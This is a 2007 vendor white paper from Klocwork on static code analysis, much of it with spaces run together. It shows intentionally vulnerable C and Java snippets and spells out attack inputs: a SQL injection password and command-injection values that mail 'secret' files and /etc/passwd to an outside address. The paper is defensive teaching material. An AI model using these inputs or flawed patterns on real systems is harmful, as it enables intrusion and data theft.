Klocwork Paper Static Analysis When Why How
12
When, Why and How to Leverage Source Code Analysis Tools Finding critical bugs in C, C++ and Java code Automated source code analysis is technology aimed at locating and describing areas of weakness in source code. Those weaknesses might be security vulnerabilities, logic errors, implementation defects, concurrency violations, rare boundary conditions, or many other types of problem-causing code. The name of the associated research field is static analysis. This is differentiated from more traditional dynamic analysis techniques such as unit or penetration test by the fact that the work is performed at build time using only the source code of the program or module in question. The results reported are therefore generated from a complete view of every possible execution path, rather than some aspect of a necessarily limited observed runtime behavior. Perhaps the most obvious question confronting any new developer-facing technology is: why? » » Why should developers use a new tool when they already have so many to choose from? » » What makes this technology compelling enough to make me want to add it to my already bloated build chain? » » And what does it do, anyway? This paper will answer these questions, and more. But for the moment just consider the fact that at time of writing, 80% of the Fortune 500 have already deployed, or are currently engaged in deploying, some kind of automated source code analysis. The reasons for doing so can be stated in as many ways as there are people answering the question, but the basic principle can be found in all of these deployments: » » Tell me what’s wrong with my code before I ship it – don’t let me be the guy responsible for shipping a killer vulnerability or bug into the wild. There are other compelling reasons, such as: » » Make my existing processes for code review more effective through automation » » Enhance my existing QA resource with 100% coverage of all boundary conditions » » Help me protect my brand as we go to market with new products But the bottom line remains the capability of this technology to afford developers the ability to scrub their code of obvious and not-so-obvious weaknesses as they work, before they submit their code for check-in and more formal down-stream validation procedures. GWYN FISHER, CTO WHITE PAPER | OCTOBER 2007 WWW.KLOCWORK.COM
Transcript of Klocwork Paper Static Analysis When Why How
When,WhyandHow toLeverageSourceCodeAnalysisTools
Finding critical bugs in C, C++ and Java code
Automatedsourcecodeanalysisistechnologyaimedatlocatinganddescribingareasofweaknessinsourcecode.Thoseweaknessesmightbesecurityvulnerabilities,logicerrors,implementationdefects,concurrencyviolations,rareboundaryconditions,ormanyothertypesofproblem-causingcode.Thenameoftheassociatedresearchfieldisstaticanalysis.Thisisdifferentiatedfrommoretraditionaldynamicanalysistechniquessuchasunitorpenetrationtestbythefactthattheworkisperformedatbuildtimeusingonlythesourcecodeoftheprogramormoduleinquestion.Theresultsreportedarethereforegeneratedfromacompleteviewofeverypossibleexecutionpath,ratherthansomeaspectofanecessarilylimitedobservedruntimebehavior.
Perhapsthemostobviousquestionconfrontinganynewdeveloper-facingtechnologyis:why?
»» Whyshoulddevelopersuseanewtoolwhentheyalreadyhavesomanytochoosefrom?
»» Whatmakesthistechnologycompellingenoughtomakemewanttoaddittomyalreadybloatedbuildchain?
»» Andwhatdoesitdo,anyway?
Thispaperwillanswerthesequestions,andmore.Butforthemomentjustconsiderthefactthatattimeofwriting,80%oftheFortune500havealreadydeployed,orarecurrentlyengagedindeploying,somekindofautomatedsourcecodeanalysis.Thereasonsfordoingsocanbestatedinasmanywaysastherearepeopleansweringthequestion,butthebasicprinciplecanbefoundinallofthesedeployments:
»» Tellmewhat’swrongwithmycodebeforeIshipit–don’tletmebetheguyresponsibleforshippingakillervulnerabilityorbugintothewild.
Thereareothercompellingreasons,suchas:
»» Makemyexistingprocessesforcodereviewmoreeffectivethroughautomation
»» EnhancemyexistingQAresourcewith100%coverageofallboundaryconditions
»» Helpmeprotectmybrandaswegotomarketwithnewproducts
Butthebottomlineremainsthecapabilityofthistechnologytoafforddeveloperstheabilitytoscrubtheircodeofobviousandnot-so-obviousweaknessesastheywork,beforetheysubmittheircodeforcheck-inandmoreformaldown-streamvalidationprocedures.
GWYNFISHER,CTOWHITEPAPER | OCTOBER2007
WWW.KLOCWORK.COM
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 2
IntroductiontotheTechnology____________________________________________________________________________________
Theprocessofautomatedsourcecodeanalysisinvolvesbuildingarichrepresentationormodeloftheprovidedcode(akintoacompilationphase),andthensimulatingallpossibleexecutionpathsthroughthatmodel,mappingouttheflowoflogiconthosepathscoupledwithhowandwheredataobjectsarecreated,usedanddestroyed.
Oncetheprojectionofcodepathsandthemappingofdataobjectsareavailable,wecanlookforanomalousconditionsthateitherwillormightpotentiallycauseexploitablevulnerabilities,executionfailure,ordatacorruptionatruntime.
Therearetwomajorfamiliesofcheckingcapabilitytypicaltothistypeofanalysis:abstractsyntaxtree(AST)validationandcodepathanalysis.Theformercaseismostfrequentlyappliedtovalidationofthebasicsyntaxandstructureofcode,whereasthelatterisusedformorecompletetypesofanalysisthatdependonunderstandingthestateofaprogram’sdataobjectsatanyparticularpointonacodeexecutionpath.
Abstract Syntax TreesAnabstractsyntaxtree,orASTforshort,issimplyatree-structuredrepresentationofthesourcecodeasmightbetypicallygeneratedbythepreliminaryparsingstagesofacompiler.Thistreecontainsarichbreakdownofthestructureofthecodeinanon-ambiguousmanner,allowingforsimplesearchestobeperformedforanomaloussyntax.
Considertheexampleofanorganizationwishingtoenforceasetofcorporatecodingstandards.Statedinthestandardisthebasicrequirementfortheuseofacompoundstatementblockratherthansinglestatementsasthebodyofaloop(e.g.afor-loop).Inthiscase,anASTcheckiswhatwouldbeappropriate:
INCORRECT CORRECT
for( i - 0; i < 10; i++ ) doSomething();
for( i - 0; i < 10; i++ ) {doSomething();}
Inthisexample,the(simplified,forclarity)ASTfortheincorrectcasewouldconceptuallyappearasfollows:
Incontrasttowhich,theASTforthecorrectcasewouldconceptuallyappearasfollows:
Asyoucanimagine,constructingcheckersthatlookforthistypeofstandardsviolationisquitestraightforwardanddependssolelyonthesyntaxofthecodeitselfandnotontheruntimebehavior,orstate,ofthatcode.Essentially,thecheckerwouldbeinstructedtofindallinstancesof“For-loop”nodesthatcontaina“Statement”nodeasanimmediatedescendant,andtoflagthemasviolations.
Similarly,ASTcheckerscaneasilybeconstructedtoenforcestandardsaroundnamingconventions,functioncallrestrictions(e.g.unsafelibrarychecks),etc.Anythingthatcanbeinferredfromthecodewithoutrequiringknowledgeofthatcode’sruntimebehavioristypicallyatargetforASTchecking.
For-loop Statement doSomething()
For-loop Statement block Statement doSomething()
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 3
GiventhesimplenatureofwhatASTcheckerscanactuallydo,therearemanytoolsthatofferthistypeofcheckingforvariousdifferentlanguages,someofwhicharefreelyavailablefromtheopensourcecommunity,forexamplePMDforJava.SeveralofthesetoolsuseXPath,oranXPath-derivedgrammartodefinetheconditionsthatthecheckerslookfor,andcustomersshouldconsideradoptingsolutionsthatprovideextensibilitymechanismsforcreatingASTcheckers.Thistypeofcheckingisrelativelysimpletodo,andconstructingnewcheckersofthistypeforcorporatecodingstandardsorindustryrecommendedbestpracticeisacommonendeavor.
Code Path AnalysisConsidernowamorecomplexexample.Thistimeinsteadoflookingforstyleviolations,wewishtocheckwhetheranattempteddereferenceofapointershouldbeexpectedtosucceedorfail:
Inthiscaseitisobviousfrommanualinspectionthatthevariable“ptr”canassumeaNULLvaluewheneverthevariable“x”isodd,andthatthisconditionwillcauseanunavoidablezero-pagedereference.
AttemptingtofindabugofthistypeusingASTscanning,however,isseriouslynon-trivial.Considerthe(simplified,forclarity)ASTthatwouldbecreatedfromthatsnippetofcode:
Inthiscase,thereisnoobvioustreesearchorsimplenodeenumerationthatcouldcovertheattempted,andatleastoccasionallyillegal,dereferencingof“ptr”inanythinglikeareasonablygeneralizedform.Soforcasessuchasthis,itisnecessarytotakeastepbeyondsimplysearchingforpatternsofsyntax,andtoanalyzethelifecycleofdataobjectsastheyappearandareusedwithinacontrolpath’sflowofexecution.
Codepathanalysistracksobjectswithinacodeexecutionpathandallowscheckerstovalidatethelegalityorcleanlinessofthedataasitgetsused.Intheexampleabove,theASTthatisbuiltforsimpletypesofstyleandsyntaxchecksisrewritteninaformthatallowsananswertobegeneratedforthefollowingquestion:
»» Isthereavalid,reachablecodepathonwhichtheassignmentofNULLisfollowedbyanattempteddereferencewithoutanintermediatecheck?
if( x & 1) ptr - NULL;*ptr - 1,;
Statement Block If-statement Check-Expression Binary-operator & x 1 True-Branch Expression-statement Assignment-operator - ptr 0 Expression-statement Assignment-operator - Dereference-pointer - ptr 1
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 4
Considerthefollowingexampleofcontrolflowanddataobjectusage:
Inthisinstancewewillunavoidablycrashwheneverboth‘x’and‘y’areodd.Findingthissituationrequiresarichrepresentationthatreflectsthestart,ortrigger,ofagivencodepath,anypropagationoraliasingthatoccursduringtheexecutionofthatcodepath,andtheend,orsink,ofthecodepath.
Inourexample,thetriggerforthecodepaththatinterestsusistheassignmentofaNULLvaluetoapointer:
Oncethisassignmentismade,wecanreasonablybeginlookingalongtheensuingreachablecodepathstocheckforpropagationand/orillegalsinkconditions.Inourexample,thefirstpotentialsinkoccursusingthevariable‘p’:
Asthevalueofthepointerischeckedforlegality,however,thisisn’tanillegalsinkconditionandsocanbeignored.Next,wehavepropagation:
Fromthispointforwardsinthereachablecodepathset,referencesto‘q’areasvalidasreferencesto‘p’,astheyarenowaliasesofeachother(untilotherwiseassigned).Knowingthis,thesystemcanagainvalidateapotentialsink:
Inthiscase,itisentirelypossibletofollowalegalcodepathallthewayfromtheassignmentofNULLthroughtotheuseofthatNULLinacrash-causingcontext,andsoapathanalysisdefectwillbereported.
Obviouslythisisonlyonetypeofthemanydifferentquestionsthatcanbeansweredusingthistypeofanalysis,suchas:
»» Isthisnewlycreatedobjectreleasedbeforeallaliasestoitareremovedfromscope?
»» Isthisdataobjecteverrange-checkedbeforebeingpassedtoanOSfunction?»» Isthisstringevercheckedforspecialcharactersbeforebeingsubmitted
asaSQLquery?»» Willthiscopyoperationresultinabufferoverflow?»» Isitsafetocallthisfunctionatthistime?
Byfollowingcodeexecutionpaths,eitherforwardfromatriggereventtowardsatargetscenario,orbackwardsfromatriggereventtowardsarequiredinitialization,wecandeterminetheanswerstothesequestionsandprovideerrorreportswhenthetargetscenarioorinitializationeitherdoesordoesnotoccurasexpected.
Thistypeofcapabilityisrequiredtodosophisticatedanalysisofsourcecodeandcustomersshouldlookfortoolsthatprovidecomprehensivecodepathanalysistoenablethelocationofflawssuchasmemoryleaks,invalidpointerdereferences,unsafeortainteddatapropagation,concurrencyviolations,andmanyothertypesofproblem-causingconditionsasdescribedinthenextsection.
void f(int x, int y) { int value, *p, *q; p = (x & 1) ? NULL : &value; if( p ) *p = 1; q = p; if( y & 1 ) *q = 1;}
p = (x & 1) ? NULL : &value;
if( p ) *p = 1;
q = p;
if( y & 1 ) *q = 1;
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 5
WhatTypeofIssuesCanBeFound?__________________________________________________________________________
Inthissection,wewillwalkthroughanumberofexamplesofproblemsthatcanbeidentifiedusingmodernstaticanalysistools,showinghowtheyoccurandwhatcanhappeniftheyarenotremediedbeforeshipment.WhilstmanymoretypesofweaknesscanbefoundusingKlocwork’stools,theseexamplesshouldgivethereaderafirmgroundinginwhatagoodstaticanalysissuitecando,regardlessofthevendor.
NotethattheexamplesgivenhereareshowninavarietyofC/C++andJava.Whereappropriate,therelevantcapabilitieswithintheproductareavailableinallsupportedlanguages,however.
Security vulnerabilitiesTraditionallyofinteresttodevelopersworkingonconsumer-facingapplications,securityisbecomingmoreandmorecriticaltodevelopersinalltypesofenvironments,eventhosethathaveuntilrecentlyconsideredsecuritytobeanon-issue.Someofthemoreimportantareasofsecuritythatcanbefoundwithsourcecodeanalysisare:
»» Denialofservice»» SQLinjection»» Bufferoverflow»» Cross-sitescripting(XSS)»» Process/fileinjection
Denial of serviceAscouldbeguessedfromthename,thistypeofvulnerabilityreflectsadesireonthepartofanattackertodenyaccesstoaserviceofferedbyoneormoreprocessesunderattack.Thiscanbecausedmanydifferentways,fromactuallycrashingtheprocess,tochokingtheservicewithaninordinatenumberofrequests,toresourceconstrainingtheservicetothepointofitbecominguseless,etc.Attackvectorsthatareexposedtosuchapproachescanoftenbespottedincodethatisnotcreatedtobedefensive,butrathermakesnaïveassumptionsabouttheoperatingenvironmentwithinwhichitwillberunning.
Considerthefollowingexample:
ThissimplefunctioncaneasilycausearesourceconstraintwithinaserverthatwilleventuallyleadtoaDoScondition.Everytimethisfunctioniscalledanewinstanceofthenamedpropertiescollectionwillbecreatedandwillnotbeclosed.Callthisfunctionwithinthemainrequesthandlerofaserviceanditwon’ttakelongfortheservicetocrawltoahalt.
Likewise,creatingresourcesusingdatathathasnotbeenvalidated(apracticeknownastaintpropagation)canquicklychokeaservice:
public void f(String name, Properties props) throws IOException{ InputStream is; is = getClass().getClassLoader().getResourceAsStream(name); if( is != null ) { props.load(is); }}
public void doGet(HttpServletRequest req,HttpServletResponse res){ String val = req.getParameter(“size”); Map props = new HashMap(Integer.parseInt(val)); …}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 6
Herethetainteddata,asretrievedfromanincomingHTTPparameter,ispassedwithoutvalidationintotheconstructorforaCollectionobject,anoperationthatcaneasilybeattackedtocausetheservicetoshutdown.
NotethatwhilethisexampleusesaJavawebservletrequestfordemonstrationpurposes,manyDoSattackvectorsexistwithinprocessboundaryconditionsthatarenormallyentirelywithinthecontrolofthedeveloperwritingtheapplication.Thistendstoleadtoassumptionsbeingmadeaboutthedatathatwillbemarshaledacrossthatboundary,allowinganattackertodisruptservicesimplybyplacingunexpectedrangesofdataonwhatissupposedtobeacleanwire,asshowninthisexample:
Withoutcheckingthevalueofthe‘bytes’variable,thereisnowaytoguaranteethatthesubsequentallocationwon’tcauseafailure,orpotentiallyworseasignificantconstraintonavailablememoryforotherpartsoftheprocess,tooccur.
SQL InjectionSQL-basedattacksfocusonsloppily-constructedqueriesthatcanresultintheattackerbeingabletocompletelycompromisetheunderlyingdatabasesecuritymodel.Considerthefollowingexampleofaloginvalidationquery:
Incomingparametersfromtheuseraresubstitutedintotheexpressionandthequeryisexecuted.Considerasetofparametersprovidedbyanattacker:
Thatbizarre-lookingpassword,ifnotappropriatelyfilteredbytheapplication,resultsintheloginvalidationqueryperformingaretrievalofeveryIDinthesystem:
Ifthisiscompoundedbytheloginsimplycheckingforsuccessorfailureofthisstatement(asopposedtocountingresultrows),theattackerisquicklygrantedwhateveraccessrightsmightbeavailablefromwhateveruserrecordsareprocessedbytheapplication.Inapplicationswherethefirstrowoftheusertableisreservedforthesuper-user,theapplicationcouldeasilybecompletelycompromised.
Therearemanyotherformsofattackpossibleusingapplicationsthatarenotcarefulintheirtreatmentofsubstitutionstringswithindatabasestatements.Luckily,alargepercentageofthemistakesmostcommonlymadeinpreparingsuchstatementscanbefoundbycheckingstringsthatarebeingprovidedtodatabasefunctionsfortaint,orthelackthereof.
void readDataFromWire(unsigned char* stream){ int bytes = (int)(*stream++); unsigned char* buffer = (unsigned char*)malloc(bytes); …}
SELECT ID FROM USERS WHERE NAME=’user’ AND PWD=’password’;
NAME: xPWD: x’ OR ‘1’ = ‘1
SELECT ID FROM USERS WHERE NAME=’x’ AND PWD=’x’ OR ‘1’ = ‘1’;
public void query(HttpServletRequest req, Connection conn) throws Exception{ Statement stmt = conn.createStatement(); String val = req.getParameter(“User”); stmt.executeQuery(“select * from users where user=’” + val + “’;”);}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 7
Inthisexample,thetaintedinputvalue“val”wasretrievedfromtheincomingrequestandsubstitutedintoadatabasestatementwithoutfirsthavingbeenscrubbedforcharactersoutsideofthealphanumericrange.Anysuchusageissubjecttoattack,andwillcausewarningstobegeneratedbythetool.
Buffer overflowBuffersorarraysthatareimproperlyhandledcanpotentiallyleadtoprocesscorruptionandeventheexecutionofarbitrarycodeinjectedbyanattacker.Considerthefollowingexample:
Inthistrivialcase,theauthorhasmadeafundamentalassumptionaboutthecleanlinessoftheincomingdata,coupledwithanarchitecturalassumptionabouttherangeofthatdata.Ifthisfunctionisusedinanenvironmentopentoattack,forexampletoprocessmarshaleddatafromanotherprocessorserver,orevenfromafilethatissubjecttoinjectionontheuser’ssystem,theattackercouldcauseconsiderablestackcorruptionsimplybyexploitingthefactthatthecodewillhappilycopyupto255bytesintoabufferabletoholdonly32.Aparticularlyaccomplishedattackercouldusethisexploittoinjectcarefullycraftedcodethateffectivelyhijackstheprocessbyinsertingdummystackcontentandoverwritingoneormorecallframes.
Arecent,highprofilesecuritybreachinMicrosoftWindowswascausedbyexactlythisscenario.The“animatedcursorvulnerability”asitwasknownwascausedbyasectionofcodethateffectivelyperformedthefollowingoperations:
Givensufficienttime,motivationandresource,attackerswereabletocompletelycompromisetargetsystemssimplybyencouraginguserstoloadandusecarefullycraftedanimatedcursorfiles.Thosecursorfilescontainedstructuresguaranteedtocausethisoperationtooverflowavailablespace,tothereforecorruptthestack,andtoplaceontheresultingstackaframeintendedtotransfercontroltofunctionsopentocompromise.
Cross-site scripting (XSS)OneofthefirstrestrictionsplacedonJavaScriptinearlybrowserversionswastobuildawallaroundpagecontentsothatscriptsexecutingwithinaframeservedbyonesitecouldnotaccesscontentofframesservedbyanothersite.Cross-sitescripting,therefore,isanattackpatternthatfocusesonenablingscriptfromonesite(theattacker’ssite)toaccesscontentfromanothersite(e.g.theuser’sbankaccountsite).Inordertodothis,theusermusttypicallyvisiteitheramaliciousoranaïvewebsite,obviously,althoughmanyexperimentsinsocialengineeringhaveshownthatuserscanbefunneledtowardseventhemostoutlandishofsitesquitereadily.
Intermsofphysicalmanifestation,themostcommonformofXSSrequiresunfilteredHTMLtobereflectedbacktotheuserfromaserverrequest.Onecommonearlyattackvectorwassearchengineresultpages,whichtypically
void f(unsigned char* stream){ unsigned char buf[32]; memcpy(buf, stream + 1, *stream); …}
HICON LoadAniIcon(…){ … ANIHEADER myAniHeader; memcpy(&myAniHeader, untrustedData->data, untrustedData->length); …}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 8
reflectedtheuser’squeryterminthetitleofthepage.Withoutfiltering,thisreflectedquerytermcouldeasilycontainHTMLtagsthatwerenotcorrectlyencodedandwillthereforebeinterpretedasvalidHTMLbythereceivingbrowser.
Inessence,anyreflectionofunfilteredincomingdatawilltriggerawarningfromthetool,asthenumberandvarietyofexploitsresultingfromXSSgrowseveryday.Forexample:
OthermanifestationsofXSSrevolvearoundthepersistentstorageofunfiltereduserinputthatislaterusedtoprovideresponsecontent.ThisisamoredifficulttypeofXSStodiagnose,astheattackpatterndependsnotonlyonauser’sunfilteredinputbeingstored,butonthatstoredtainteddatabeingmadeavailabletoeveryuserfromthatpointonwards.Naïveforumsoftwarepackageswereparticularlysusceptibletothisattackpatternintheearlydaysoftheweb,butinessenceanyapplicationthatstoresincomingunfilteredwebdatainadatabase(orfile)andthenreflectsthatstoreddatabacktotheuseratalaterdateisvulnerabletothispersistentformofXSS.Duetothisattackpatternbeingsodestructiveifexploited,thetooltriggersawarningwheneverunfiltereddataisretrievedfrompersistentstorageandforwardedtotheuser.
Process or file injectionOfparticularvaluetoattackers,andthereforeparticularlytobeavoidedbyauthors,areattackvectorsthatallowthemodificationofsystemcommandsand/orsystemfiles.Performingprocesscreationusingtaintedinput,orcreatingfilesusingtaintednamesorlocationsarethemostprevalentmistakesmade.
Considerthefollowing:
Inthisexampletheauthorhasleftthemselvesopentomaliciousattackbynotscrubbingtheincomingfilenamebeforeappendingittoaninnocuous-lookingcommand.Considerinputthatgetsappendedbythisfunctionwithoutfurtherprocessingtothe“ls”commandsuchas:
or
Ingeneral,anyexitpointtotheunderlyingOSthatuseseitheracommandorfilenamemustbevalidatedforspecialcharacterspriortothecallbeingplaced.Failuretodosomaywellresultincatastrophicresultsfortheoperatingenvironment.
public void doGet(HttpServletRequest req, HttpServletResponse res){ String title = req.getParameter(“searchTerm”); res.getOutputStream().write(title.getBytes(“UTF-8”));}
void doListing(char* name){ char command[256]; if( strlen(name) < 250 ) { sprintf(command, “ls %s”, name); system(command); }}
-R / | grep secret | mail [email protected]
/dev/null | cat /etc/passwd | awk –F: ‘{print $1}’ | mail [email protected]
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 9
Anotherexampleshowsafile-specificattackvector:
Inthisexample,apotentiallytaintedstringisusedtoconstructarelativepathname.Unfortunatelyfortheauthor,theFileconstructorusedhereplacesnorestrictionontheuseof“../”beingapathelement,thusleavingthisapplicationwideopentoarbitraryfilecreationand/oroverwrite.
Implementation defectsRegardlessoftheapplicationbeingdeveloped,implementationdefectsthatescapeintothewildhavesignificantimpactontheproductbeingdeployed.Thiscouldrangefromincreasedsupportcoststoongoingbrandcriticismtobottomlineimpactfrominventoryreversal.Releasingaqualityproductiseverybody’sgoal,andstaticanalysistoolscanhelpsignificantlyinbringingthatproducttomarket.Someofthemoreimportantareasofqualityandongoingmaintenanceare:
»» Memorymanagement;leaks,usingreleasedmemory,etc.»» NULLpointerdereference/exception»» Arrayboundsviolations»» Concurrencyflawsanddeadlocks
Memory management mistakesMemoryallocationandthecorrectreleasingofthatmemoryisamajorsourceofdefects,particularlyinCandC++code.Staticanalysisiswellappliedinthisarea,duetocomprehensivecoverageofcodepathsthatcanresultinrareboundaryconditionsbeingsignaledthatmightneverbefoundusingtraditionalruntimeprofilingtools.
Comprehensivestaticanalysistoolsshouldbeabletotrackallocationsandaliasesofallocatedmemorytoensurethatallallocationsarereleased,thatcodepathsdonotattempttomakeuseofreleasedmemory,andthatmemoryobjectsarenotreleasedtwice.
public void doPost(HttpServletRequest req, HttpServletResponse resp){ String loc = req.getParameter(“name”); unpackFilesTo(loc, req.getInputStream());}private void unpackFilesTo(String loc, InputStream data){ File dir = new File(“./unpacked/”, loc); …}
void f(…){ char* p = (char*)malloc(32); char* q = p; /* Use of unchecked allocation, might well be NULL */ strcpy(p, “hello world”); /* Release the memory by freeing an alias */ free(q); /* Attempted use of already released memory */ strcpy(p, “not good”); free(p);}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 10
NULL pointer dereferenceDefectsinvolvingNULLpointersareasoldasprogrammingitself,andstillasprevalenttodayasinanytimebefore.WeallunderstandwhatNULLpointerscando,andweallspendtimelookingforthemanddealingwiththeafter-effectsoftheirbeingfoundinthewild.Butconsiderthefollowingexamplecodingpatternthatisfairlyprevalentinevenwell-knownandmoderncodebases:
OrperhapsaJavaexample–justbecausetherearen’tpointersinthelanguagedoesn’tmeanyoucan’tdereferenceaNULLobjectreference:
FunctionsthatreturnNULLunderaberrantconditions,andwhosereturnedvaluesarelaterde-referenced,areparticularlydifficulttodiagnose.Ifthestaticanalyzerisabletoconsidereverypotentialcodepath,howeverunlikely,eventheserareboundaryconditionsarefoundandreported.
Array bounds violationsAccessingarraysoutofboundsisanincrediblycommonmistake,evenbyseniordevelopers.ConsiderthefollowingexamplefromcodewrittenbyavendorinsupportoftheirdeviceunderLinux(detailsobscured):
Inmanyinstances,perhapsthemajorityofthetime,thiscodewillrunwithouthiccup.Buteventuallyitisguaranteedtocauseabusfaultorpageviolationbasedontheindexcheckbeingperformedafterthatindexisusedtoaccessthe‘dev’array.
Concurrency violationsWiththetrendtowardsmoreandmoremulti-coredesignsatthechiplevel,developersareincreasinglybeingcalledupontocreatethreaded,oratleastthread-aware,software.ThisplacesadditionalburdenintermsofunderstandinghowcertainOScallsinteractwithlocksthatcancausethreadstohang,andpotentiallytodeadlocktwoormorethreadsinaprocess.
Onlyahandfuloftools,suchastheonesprovidedbyKlocwork,areabletoapplyvalidationsintheareaofconcurrency,suchasensuringthatthreadsholdinglocksdonotattempttosuspendorhaltthemselves,thatlocksarecorrectlyreleased,andthatlockholdersdonotattemptreal-timepausingactivities.
void f(char* ptr){ if( *ptr && ptr ) …}
public void f(String str){ if( str.length() == 0 || str == null ) return; …}
int f(){ struct devinfo* dev[8]; int i; get_device_info(dev, 8); for( i = 0; dev[i] && (i < 8); i++ ) { … }}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 11
Forexample:
Inthispathologicalexample,allthreadsrequiringaccesstothe“lock”mutexwouldbedeadlockedfor30swaitingforthissegmenttounlock.
Worseyet,thefollowingexampleshowsanever-releasedlock:
Inthecasewherethefunction“op”returnszero,thecallingthreadwillmaintainthemutexonreturn.Assumingthislockisbeingusedfortaskschedulingorothertypicalserveractivities,theobviousresultisahungsystem.
Anotheraspectofconcurrencyisconcurrentmodificationofdataobjects.ThefollowingexampleshowsaJavaCollectionoperationthatwillbeflaggedasillegal:
Infact,thisoperationisillegaleveninasinglethreadedenvironmentasitviolatesabasiccontractwithintheCollectionsframework,butinamulti-threadedenvironmentthelikelihoodofthiscausingadatacorruptingproblemwithintheCollectionitselfisvastlyincreased.
Summary__________________________________________________________________________________________________________________
Asadeveloperconsideringusingautomatedsourcecodeanalysis,oradevelopmentmanagerconsideringprovidingsuchanalysistoolsforagroupofcoders,itshouldbeobviousfromtheprevioussectionsofthisdocumentwhatkindofproblemscanbefoundandhowthismightapplyinday-to-daysituations.Inadditiontowhatisdescribedhere,moretypesofproblemscanbefoundbyKlocwork’stools,rangingfromadditionaltypesofsecurityorqualitydefects,tolocatingdeadcode,toincompleteorredundantheaderinclusion,toarchitecturalcoherence,tometricsviolations,andmanyothers.
Oneofthekeyaspectsofanydevelopmenttoolishowitworksforthedeveloper,andbyprovidingIDEintegrationwiththemostcommonlyusedenvironments(VisualStudio,Eclipse,IDEA,WindRiverWorkbench,QNXMomentics,etc.)as
pthread_mutex_t lock;void f(){ pthread_mutex_lock(&lock); sleep(30000); pthread_mutex_unlock(&lock);}
void f(){ pthread_mutex_lock(&lock); switch( op() ) { case 0: return; default: break; } pthread_mutex_unlock(&lock);}
public void f(Collection coll){ for( Iterator it = coll.iterator(); iter.hasNext(); ) { String el = (String)it.next(); if( el.startsWith(“/”) ) coll.remove(el); }}
wellasrobustcommandlinetoolsformoretraditionaldevelopmentenvironments,Klocworkisallaboutsupportingdevelopersintheirnativehabitat.
Whowantstobethepersononthehotseatwhenacriticalvulnerabilityisexploitedinthefield,orwhenacodingmistakecausesaninventoryturnaroundandcostsyourcompanyseriousmoney?Avoidthatexposurebyperformingthemostrigorousformofautomatedcodereviewpossibletoday,anddoitonyourdesktopatthesametimeasyoubuildyourcode.
Klocworkyoursourcecodeandfeelconfidentthatyou’recheckinginthemostsecureanddefect-freecodeyou’veevercreated.
AbouttheAuthor_______________________________________________________________________________________________________
GwynFisheristheCTOofKlocworkandisresponsibleforguidingthecompany’stechnicaldirectionandstrategy.Withnearly20yearsofglobaltechnologyexperience,Gwynbringsavaluablecombinationofvision,experience,anddirectinsightintothedeveloperperspective.Withabackgroundinformalgrammarsandcomputationallinguistics,Gwynhasspentmuchofhiscareerworkinginthesearchandnaturallanguagedomains,holdingseniorexecutivepositionswithcompanieslikeHummingbird,FulcrumTechnologies,PCDOCSandLumaPath.AtKlocwork,Gwynhasreturnedtohisoriginalpassion,compilertheory,andisleveraginghisexperienceandknowledgeofthedevelopermindsettomovethepracticaldomainofstaticanalysistothenextlevel.
AboutKlocwork_________________________________________________________________________________________________________
Klocwork®offersaportfolioofsoftwaredevelopmentproductivitytoolsdesignedtoensurethesecurity,qualityandmaintainabilityofcomplexcodebases.Usingprovenstaticanalysistechnology,Klocwork’stoolsidentifycriticalsecurityvulnerabilitiesandqualitydefects,optimizepeercodereview,andhelpdeveloperscreatemoremaintainablecode.Klocwork’stoolsareanintegralpartofthedevelopmentprocessforover850customersintheconsumerelectronics,mobiledevices,medicaltechnologies,telecom,militaryandaerospacesectors.
IN THE UNITED STATES:15 New England Executive ParkBurlington, MA 01803
IN CANADA:30 Edgewater Street, Suite 114Ottawa, ON K2L 1V8
t: 1.866.556.2967f: 613.836.9088www.klOCwORk.COm
© Copyright Klocwork Inc. 2010 · All Rights Reserved
